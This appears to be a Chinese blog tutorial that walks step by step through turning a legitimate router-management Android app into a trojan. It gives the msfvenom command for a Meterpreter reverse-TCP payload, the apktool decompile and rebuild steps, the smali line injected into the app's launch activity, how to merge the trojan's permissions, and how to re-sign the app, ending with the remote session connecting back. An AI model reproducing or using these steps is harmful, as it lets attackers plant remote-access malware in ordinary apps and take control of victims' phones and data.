本示例仅为学习研究所用,使用请准守《网络安全法》。造成一切后果,自行承担。本站不但任何责任!!!

前期的准备

  • 某路由器管理APP(luyou.apk)
  • kali Linux
  • 手机(android 10)

01 生成Android shell

在生成之前,确定本机的ip地址。

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.93 LPORT=5555 R > 66.apk

这样我们便生成了一个名为66.apk的android shell

02 反编译刚才生成的shell和正常app

apktool d 66.apk
apktool d luyou.apk


反编译后的效果

03 注入PAYLOAD

-1 进入luyou文件夹,打开AndroidManifest.xml文件
-2 搜索关键字LaunchMain找到所对应启动的smail文件,说白了就是找app启动文件路径

当前的启动路径为:com/mercury/mercuryrouterLaunchActivity
打开文件LaunchActivity.smali搜索onCreat函数,找到bundle对象,换行添加启动PAYLOAD代码:

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

04 将木马文件中的smali文件复制到载体smali文件夹中

cp -r 66/smali/com/* luyou/smali/com/

05添加权限

打开木马AndroidManifest.xml文件
复制以<uses-permission android:name=.......>
开头的所有代码按照格式复制到载体luyou的AndroidManifest.xml文件中,删除重复权限就ok

06回遍

apktool b luyou

07签名

这样我们的app添加就算完成了,但是在手机是无法运行的。因为没有签名。
生成KEYSTORE:

keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222

签名:

jarsigner -keystore mykey.keystore luyou.apk alias_name -s

08 测试

安装app

msf终端成功上线

Last modification:March 2nd, 2020 at 09:28 pm
正在沿街乞讨中……